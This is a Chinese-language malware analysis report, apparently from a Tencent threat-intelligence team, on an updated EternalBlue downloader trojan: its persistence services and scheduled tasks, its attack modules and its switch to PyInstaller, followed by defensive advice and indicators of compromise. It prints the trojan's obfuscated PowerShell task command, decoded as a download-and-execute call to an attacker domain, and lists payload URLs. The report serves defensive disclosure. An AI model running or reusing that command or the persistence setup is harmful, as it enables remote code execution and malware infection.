一、背景

腾讯御见威胁情报中心2019年2月10日发现永恒之蓝下载器木马再次更新，此前攻击者针对驱动人生公司的供应链进行攻击，利用其软件升级通道下发永恒之蓝下载器木马，并利用其软件升级通道下发木马，在攻击模块中利用“永恒之蓝”漏洞攻击，造成短时间内大范围感染。事件发生之后，驱动人生公司对受到木马影响的升级通道进行了紧急关闭。 

但该木马下载器的幕后控制者并没有就此放弃行动，而是借助其已经感染的机器进行持续攻击：包括通过云控指令下发挖矿模块，在中招机器安装多个服务以及通过添加计划任务获得持续执行的机会，后续版本在攻击模块新增SMB爆破、远程执行工具psexec攻击、利用Powershell版mimikatz获取密码，以增强其扩散传播能力。

2019年2月10日发现的更新版本中，我们发现攻击者再次对攻击模块进行升级，改变其木马生成方式为Pyinstaller，同时在打包的Python代码中新增了email、cookie、ftp、http相关功能文件。

二、持久化

木马通过将程序安装至系统服务、计划任务从而可以开机启动同时每隔一段时间重复启动，获得在感染电脑持续驻留的机会。

服务安装

当前版本木马共安装两个服务，服务Ddriver用来启动主程序，该程序负责启动攻击模块以及接受云控指令。服务WebServers用来启动后门程序wmiex.exe，该程序负责下载其他文件、上报信息、管理服务进程。 

服务名：Ddriver，可执行文件路径c:\windows\SysWOW64\drivers\svchost.exe

服务名：WebServers，可执行文件路径c:\windows\SysWOW64\wmiex.exe

计划任务

当前版本木马共安装四个计划任务，其中计划任务Ddrivers负责启动主模块，指向服务Ddriver相同文件；计划任务WebServers负责启动后门程序wmiex.exe，指向服务WebServers相同程序。计划任务DnsScan负责启动攻击模块，该模块利用永恒之蓝漏洞、SMB弱口令爆破、PSEXEC、MimiKatz等多种方式进行攻击。计划任务Bluetooths负责下载执行远程Powershell指令。 

计划任务名：Ddrivers，启动路径：cmd.exe /c c:\windows\SysWOW64\drivers\svchost.exe

触发器：在首次触发后，无限期地每隔00:50:00重复一次。

计划任务名：DnsScan,启动程序：c:\Windows\Temp\svchost.exe

触发器：在首次触发后，无限期地每隔1小时重复一次。

计划任务名：WebServers,启动程序：cmd.exe /c  c:\windows\SysWOW64\wmiex.exe

触发器：在首次触发后，无限期地每隔00:50:00重复一次。

计划任务名：Bluetooths,启动程序：

powershell  -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=

(解密字符：powershell  -ep bypass –e IEX (New-ObjectNet.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN))

触发器：在首次触发后，无限期地每隔00:50:00重复一次。

三、攻击模块

攻击模块c:\Windows\Temp\svchost.exe，根据感染后安装的服务以及计划任务，会在每次开机时启动，同时在首次启动后每隔1小时执行一次。在首次下发之后，攻击者对该模块进行了多次更新，以继续扩大感染范围。 

目前最新的版本具有以下几种攻击行为：

1、永恒之蓝漏洞攻击

2、SMB弱口令爆破攻击

3、远程执行工具psexec攻击

4、Powershell版mimikatz获取登录密码

四、攻击模块最新变化

腾讯御见威胁情报中心在2019年2月10日再次捕获到攻击模块的更新，此次更新具有以下变化： 

1、木马生成方式改变

攻击模块(C:\Windows\Temp\svchost.exe)的打包方式由原来的py2exe生成替换为使用Pyinstaller生成。第一种情况下只需使用winrar解压即可获取python源文件，此次变化后需要通过Pyinstaller的解压模块pyinstxtractor.py在python环境下进行恢复，增加了分析成本。使用pyinstxtractor.py对该文件进行恢复后，释放出了了349个python编译文件。

2、新增Python代码

2019年1月25日更新后的代码目录

2019年2月10日更新后的代码目录

将前后进行对比可以发现，最新的样本解压目录中新增了email包、json包以及_LWPCookieJar.pyc、_MozillaCookieJar.pyc、cookielib.pyc、ftplib.pyc、httplib.pyc、urlib.pyc等多个文件。新增的模块可用于解析邮件、搜集用户Cookie信息、登录FTP服务、发送HTTP请求等操作。

五、安全建议

1.服务器暂时关闭不必要的端口（如135、139、445），方法可参考：https://guanjia.qq.com/web_clinic/s8/585.html 

2.服务器使用高强度密码，切勿使用弱口令，防止黑客暴力破解； 

3.使用杀毒软件拦截可能的病毒攻击； 

4.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统，是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统

IOCs

Md5

59b18d6146a2aa066f661599c496090d

30429a24f312153c0ec271ca3feabf3d

f9144118127ff29d4a49a30b242ceb55

fb89d40e24f5ff55228c38b2b07b2e77

1e0db9fdbc57525a2a5f5b4c69fac3bb

5ab6f8ca1f22d88b8ef9a4e39fca0c03

d4e2ebcf92cf1b2e759ff7ce1f5688ca

32653b2c277f18779c568a1e45cacc0f

ab1c947c0c707c0e0486d25d0ae58148

bc26fd7a0b7fe005e116f5ff2227ea4d

a4b7940b3d6b03269194f728610784d6

85013cc5d7a6db3bcee3f6b787baf957

667a3848b411af0b6c944d47b559150f

domain

i.haqo.net

ii.haqo.net

dl.haqo.net

loop.haqo.net

loop2.haqo.net

loop.abbbny.com

oo.beahh.com

pp.abbny.com

o.beahh.com

p.abbny.com

v.beahh.com

IP

139.163.55.76

172.104.73.9

URL

hxxp://dl.haqo.net/dll.exe

hxxp://172.104.73.9/dll.exe

hxxp://dl.haqo.net/updatedl.exe

hxxp://i.haqo.net/i.png

hxxp://ii.haqo.net/u.png

hxxp://oo.beahh.com/u.png

hxxp://pp.abbny.com/u.png

hxxp://p.abbny.com/im.png

hxxp://dl.haqo.net/i_1.exez

hxxp://dl.haqo.net/xmrig-64_1.mlz

hxxp://dl.haqo.net/xmrig-32_1.mlz

hxxp://dl.haqo.net/ins4.exez

hxxp://v.beahh.com/v